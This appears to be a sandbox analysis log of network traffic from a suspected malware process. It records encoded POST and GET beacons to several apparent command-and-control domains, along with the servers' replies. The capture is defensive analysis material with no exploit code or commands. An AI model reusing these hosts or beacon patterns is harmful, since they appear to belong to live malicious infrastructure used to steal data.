                                                                                                                                                                                                                        Referer: http://www.innovators.group/6fde/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 71 5a 75 7a 74 2f 71 76 47 47 76 4d 45 30 78 57 4b 34 74 6d 58 2b 69 6e 6e 68 61 53 30 48 2f 38 57 38 55 4c 30 57 58 65 43 59 4a 44 69 36 4e 4e 57 32 6d 75 2f 51 51 46 47 73 54 46 53 58 4a 37 74 33 75 7a 6a 61 57 4b 47 76 45 34 67 43 2b 61 49 41 58 30 4a 31 56 35 79 69 51 69 4a 4a 69 65 7a 74 57 56 68 38 68 44 37 75 36 65 4f 64 59 4a 59 38 66 39 38 5a 59 2b 66 49 6d 37 65 59 49 31 5a 65 64 70 4f 37 33 55 75 36 39 2f 46 58 59 61 71 67 72 34 2b 68 77 69 67 50 39 72 63 59 54 4b 4a 6c 55 31 52 66 70 72 70 31 38 50 7a 76 39 47 68 64 61 56 73 4e 42 55 6b 53 46 6f 51 44 56 36 73 41 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=qZuzt/qvGGvME0xWK4tmX+innhaS0H/8W8UL0WXeCYJDi6NNW2mu/QQFGsTFSXJ7t3uzjaWKGvE4gC+aIAX0J1V5yiQiJJieztWVh8hD7u6eOdYJY8f98ZY+fIm7eYI1ZedpO73Uu69/FXYaqgr4+hwigP9rcYTKJlU1Rfprp18Pzv9GhdaVsNBUkSFoQDV6sA==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        58192.168.11.204985013.248.169.48805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:10.623800039 CEST837OUTPOST /6fde/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.innovators.group
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.innovators.group
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.innovators.group/6fde/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 71 5a 75 7a 74 2f 71 76 47 47 76 4d 45 55 68 57 49 62 46 6d 53 65 69 6b 70 42 61 53 6d 48 2f 77 57 38 51 4c 30 54 32 44 43 71 64 44 69 59 56 4e 58 31 2b 75 73 67 51 46 4e 4d 54 41 57 58 49 35 74 33 79 4e 6a 62 71 4b 47 76 41 34 67 48 36 61 49 33 37 31 49 6c 56 37 6e 79 51 67 47 70 69 65 7a 74 57 56 68 38 31 35 37 75 69 65 50 74 49 4a 61 64 66 2b 2f 5a 59 39 63 49 6d 37 4a 6f 4a 2b 5a 65 64 50 4f 2b 58 75 75 2b 4e 2f 46 53 6b 61 70 30 2f 35 31 68 77 65 75 76 38 63 61 36 61 6f 48 6d 55 45 51 50 5a 69 72 58 41 52 2f 5a 77 63 38 76 75 78 76 65 64 6d 67 69 38 41 53 42 55 68 78 44 6e 53 4f 4e 4a 55 45 74 77 46 61 58 6d 68 41 4d 6f 4e 51 72 38 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=qZuzt/qvGGvMEUhWIbFmSeikpBaSmH/wW8QL0T2DCqdDiYVNX1+usgQFNMTAWXI5t3yNjbqKGvA4gH6aI371IlV7nyQgGpieztWVh8157uiePtIJadf+/ZY9cIm7JoJ+ZedPO+Xuu+N/FSkap0/51hweuv8ca6aoHmUEQPZirXAR/Zwc8vuxvedmgi8ASBUhxDnSONJUEtwFaXmhAMoNQr8=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        59192.168.11.204985113.248.169.48805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.262542009 CEST5156OUTPOST /6fde/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.innovators.group
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.innovators.group
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.innovators.group/6fde/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 71 5a 75 7a 74 2f 71 76 47 47 76 4d 45 55 68 57 49 62 46 6d 53 65 69 6b 70 42 61 53 6d 48 2f 77 57 38 51 4c 30 54 32 44 43 71 46 44 69 72 64 4e 57 55 2b 75 39 51 51 46 41 73 54 42 57 58 49 34 74 33 71 52 6a 62 6d 30 47 74 49 34 69 68 47 61 4f 44 76 31 42 6c 56 37 34 43 51 6a 4a 4a 69 48 7a 74 47 52 68 38 6c 35 37 75 69 65 50 75 67 4a 54 73 66 2b 7a 35 59 2b 66 49 6e 76 65 59 4a 57 5a 66 31 78 4f 2b 62 45 79 66 78 2f 43 7a 55 61 36 79 44 35 70 78 77 63 2b 2f 38 45 61 36 47 65 48 6d 49 69 51 50 73 35 72 51 38 52 73 76 39 36 6c 2b 2f 76 31 4e 41 78 70 6a 30 38 47 6e 4d 59 32 79 58 46 4a 72 56 45 4b 74 34 50 53 68 62 73 48 35 38 4c 52 38 52 41 69 65 51 6e 6d 52 2b 72 32 66 6a 31 57 38 43 34 73 49 63 73 65 39 66 45 70 55 49 5a 54 65 63 4a 52 39 53 38 45 62 49 6a 49 77 66 72 4d 77 35 6a 55 53 52 6a 4d 45 68 71 4f 31 6c 78 4b 69 4f 69 76 58 33 68 34 66 59 33 42 59 6d 74 55 74 45 30 4a 65 55 4d 6b 78 35 2b 46 30 66 75 6c 6b 35 70 57 39 76 4e 73 74 47 4e 67 48 69 6b 61 67 6f 36 50 79 65 6f [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=qZuzt/qvGGvMEUhWIbFmSeikpBaSmH/wW8QL0T2DCqFDirdNWU+u9QQFAsTBWXI4t3qRjbm0GtI4ihGaODv1BlV74CQjJJiHztGRh8l57uiePugJTsf+z5Y+fInveYJWZf1xO+bEyfx/CzUa6yD5pxwc+/8Ea6GeHmIiQPs5rQ8Rsv96l+/v1NAxpj08GnMY2yXFJrVEKt4PShbsH58LR8RAieQnmR+r2fj1W8C4sIcse9fEpUIZTecJR9S8EbIjIwfrMw5jUSRjMEhqO1lxKiOivX3h4fY3BYmtUtE0JeUMkx5+F0fulk5pW9vNstGNgHikago6PyeoVn+tdQFLhK8czYUb+nrB1rFJnVkhsUiDeZ2JE+m9PFd0eEc/ZalANW001tihJUOl6U76BFrZfhkwBL/aqRLia02T2ICJwGXp9za+yNAq+LJvX/eGG2haneujbLR3QD0Lxilbuu76gUA0wIY/1vMjmahlU29kMTaF84rpnhilg2OB+H0NIc9acVwGJIdZ7Zect9GwCQBcgV4bqbd/hjAgRc73rMiA+ScYL2VFr4R1BbHpHKD+XtJGPIm3OagmZHx7lQk/P9frlLcL34yzFqP8fLVpO7wJuU5fPR5kiMcc8Mgh6KY4jP2HrR1gpYyi/dz9IYv0WjodMGSABsmyqOSZ+Bi06FnnFe8WbK3/k3TMX3W8joR2gzX/83KRm19P/YHvTRpqgoLxd4l/sjlsh4MwOSI/oQJbQN0aemB+KUQL3XIuqFbrVmQziwssHVCT4qTdeCgPaaWJqa6Ehj7MWuSGRJNnpj1dkebYBGKUaE/y7g0ng8FuOsKGsw8na32WRHsyFjFSEjyMY2qcBh39+Ohz+EhNFFs1aFXV1xla4S044VkUWq9Y9XTOVMuMfiBfkS9/2QvBPvgDZ4Zi8APjUTJ8ZcV1O7GrIDZAdPOUh0ufcB4dxgzNqr0Ofw+WfEtg1gCWwGVMK2MMh8HTbKlO5c8rs0QcsZwqjmE4sN [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.262624979 CEST2830OUTData Raw: 45 57 48 6d 66 45 63 52 5a 67 59 74 4c 4e 4a 37 46 6c 48 44 48 4d 59 44 47 38 79 51 36 65 61 32 52 41 30 45 57 50 4d 41 34 43 6e 55 58 75 79 4b 64 6b 55 69 61 72 2f 7a 75 63 47 53 5a 2b 46 42 39 59 49 55 69 2b 4b 6f 4f 4f 46 78 76 6a 4e 41 53 33
                                                                                                                                                                                                                        Data Ascii: EWHmfEcRZgYtLNJ7FlHDHMYDG8yQ6ea2RA0EWPMA4CnUXuyKdkUiar/zucGSZ+FB9YIUi+KoOOFxvjNAS37Daz7UpREQxxvdH04eHR1kOjq2qexVvtK+utiJOjMBZ/SRmFuEK4lirNa/5L8qqu5sc+u5oyJT2UNwX2bKxGmWrq0CoHE26XWp6dJOFnSL2f752Be2wEb1Wi0mevd5zlgk0rsJEaI8Z+P5x99tdx9upRaP/D3cSvj


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        60192.168.11.204985213.248.169.48805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:15.899660110 CEST538OUTGET /6fde/?2rul-=nbGTuLemKRTpMBhECM1mMcTVmibgynjed6008TvXOLJMhaVDWlSxtENlCtfhfXIYxXqpopSgMtQMvB67FBGeOiwcmCMnIoT/zPipv8Zc3bHdVtIwetv/s5E=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.innovators.group
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:57:16.002032995 CEST390INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:15 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 72 75 6c 2d 3d 6e 62 47 54 75 4c 65 6d 4b 52 54 70 4d 42 68 45 43 4d 31 6d 4d 63 54 56 6d 69 62 67 79 6e 6a 65 64 36 30 30 38 54 76 58 4f 4c 4a 4d 68 61 56 44 57 6c 53 78 74 45 4e 6c 43 74 66 68 66 58 49 59 78 58 71 70 6f 70 53 67 4d 74 51 4d 76 42 36 37 46 42 47 65 4f 69 77 63 6d 43 4d 6e 49 6f 54 2f 7a 50 69 70 76 38 5a 63 33 62 48 64 56 74 49 77 65 74 76 2f 73 35 45 3d 26 48 68 3d 67 36 42 6c 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=nbGTuLemKRTpMBhECM1mMcTVmibgynjed6008TvXOLJMhaVDWlSxtENlCtfhfXIYxXqpopSgMtQMvB67FBGeOiwcmCMnIoT/zPipv8Zc3bHdVtIwetv/s5E=&Hh=g6BlO"}</script></head></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        61192.168.11.204985362.149.128.4580
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.283668041 CEST536OUTGET /pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroS+CBDl0e/03G6vIGgM2DOx4ZCTRM54bCOA7z+XcSGAiseRvin1n9lPpnkGa0LOYYd0oIGRqFGq723QGUcE=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.caprinaday.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477386951 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:24 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Length: 5096
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477447987 CEST1289INData Raw: 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30
                                                                                                                                                                                                                        Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477490902 CEST1289INData Raw: 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64
                                                                                                                                                                                                                        Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477534056 CEST1289INData Raw: 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e
                                                                                                                                                                                                                        Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477566957 CEST159INData Raw: 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c 31 37 37 36 33 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f
                                                                                                                                                                                                                        Data Ascii: oft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        62192.168.11.204985413.248.169.4880
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:29.601295948 CEST796OUTPOST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 43 73 54 70 6c 46 6a 59 59 57 4e 37 30 79 66 6a 71 2f 67 56 53 70 39 34 35 4f 66 7a 72 6b 6b 55 76 35 57 4d 37 35 73 77 63 51 73 50 42 66 51 55 34 47 7a 68 69 39 67 4d 51 4f 79 48 53 6d 41 6c 6a 48 4e 50 61 2f 65 32 37 2b 4a 51 71 49 37 44 49 5a 2b 32 74 66 4f 58 64 54 4d 69 77 4b 67 61 6e 39 57 44 56 57 73 6c 4b 69 36 67 74 4b 5a 71 54 54 65 58 6a 76 63 77 48 79 63 65 6c 6e 43 31 37 52 74 49 59 74 79 54 62 71 55 6e 37 33 6d 49 47 73 72 68 39 6e 6c 64 43 65 62 79 39 6e 43 31 54 48 4e 4f 33 43 39 54 4f 76 63 53 4c 45 6a 4f 4e 43 68 75 36 7a 44 51 72 6d 31 46 39 44 35 62 43 67 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN70yfjq/gVSp945OfzrkkUv5WM75swcQsPBfQU4Gzhi9gMQOyHSmAljHNPa/e27+JQqI7DIZ+2tfOXdTMiwKgan9WDVWslKi6gtKZqTTeXjvcwHycelnC17RtIYtyTbqUn73mIGsrh9nldCeby9nC1THNO3C9TOvcSLEjONChu6zDQrm1F9D5bCg==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        63192.168.11.204985513.248.169.4880
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:32.242856979 CEST816OUTPOST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 43 73 54 70 6c 46 6a 59 59 57 4e 37 31 53 50 6a 6c 38 59 56 46 35 39 33 32 75 66 7a 6c 45 6b 51 76 34 71 4d 37 38 56 31 64 6c 45 50 42 2b 67 55 35 46 72 68 6c 39 67 4d 49 2b 79 43 64 47 41 75 6a 48 52 39 61 36 32 32 37 2b 64 51 71 49 4c 44 49 75 4c 45 69 76 4f 52 56 7a 4d 67 2b 71 67 61 6e 39 57 44 56 58 4e 49 4b 69 69 67 71 2f 4a 71 53 33 43 55 39 66 64 43 43 79 63 65 68 6e 43 78 37 52 73 6e 59 6f 72 38 62 76 51 6e 37 32 57 49 47 35 58 2b 71 58 6c 45 66 75 61 4f 73 33 2f 65 59 6b 4a 34 7a 7a 4a 52 4c 75 68 76 4f 53 75 55 51 77 56 4b 35 67 66 69 76 57 4d 74 2f 42 34 41 66 75 79 4e 34 61 32 43 6b 2b 47 74 64 64 57 74 2f 37 50 54 2f 75 67 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN71SPjl8YVF5932ufzlEkQv4qM78V1dlEPB+gU5Frhl9gMI+yCdGAujHR9a6227+dQqILDIuLEivORVzMg+qgan9WDVXNIKiigq/JqS3CU9fdCCycehnCx7RsnYor8bvQn72WIG5X+qXlEfuaOs3/eYkJ4zzJRLuhvOSuUQwVK5gfivWMt/B4AfuyN4a2Ck+GtddWt/7PT/ug=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        64192.168.11.204985613.248.169.4880
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.881376982 CEST6445OUTPOST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 43 73 54 70 6c 46 6a 59 59 57 4e 37 31 53 50 6a 6c 38 59 56 46 35 39 33 32 75 66 7a 6c 45 6b 51 76 34 71 4d 37 38 56 31 64 6c 63 50 42 49 63 55 34 6b 72 68 6b 39 67 4d 57 4f 79 44 64 47 41 76 6a 48 4a 35 61 36 36 49 37 36 74 51 72 71 44 44 41 38 6a 45 35 66 4f 52 4b 44 4d 74 77 4b 67 50 6e 39 48 72 56 58 39 49 4b 69 69 67 71 2b 35 71 62 44 65 55 2f 66 63 77 48 79 63 73 6c 6e 43 56 37 51 46 51 59 70 36 44 62 38 59 6e 36 57 47 49 45 50 44 2b 32 48 6c 52 65 75 61 57 73 33 7a 42 59 6c 6c 61 7a 77 56 37 4c 74 42 76 50 45 6e 38 46 6b 4e 31 74 42 44 42 74 46 34 36 7a 41 34 38 51 74 43 71 39 4a 36 52 76 49 61 6e 64 62 61 6b 76 4c 37 31 72 37 5a 74 58 62 61 58 39 54 69 71 67 30 44 53 62 47 49 49 4e 43 65 50 52 59 44 74 65 57 59 59 54 34 46 68 68 43 57 42 2f 2f 72 46 75 73 30 43 46 4e 68 68 77 53 2b 32 64 72 56 57 33 59 6e 78 75 32 2b 47 38 74 44 55 50 55 79 4a 51 32 7a 31 4b 75 77 58 6b 4e 49 55 30 38 35 30 72 64 35 47 44 38 45 54 42 68 66 49 43 44 4c 4c 44 77 77 50 47 38 59 4b 34 35 34 71 [TRUNCATED]
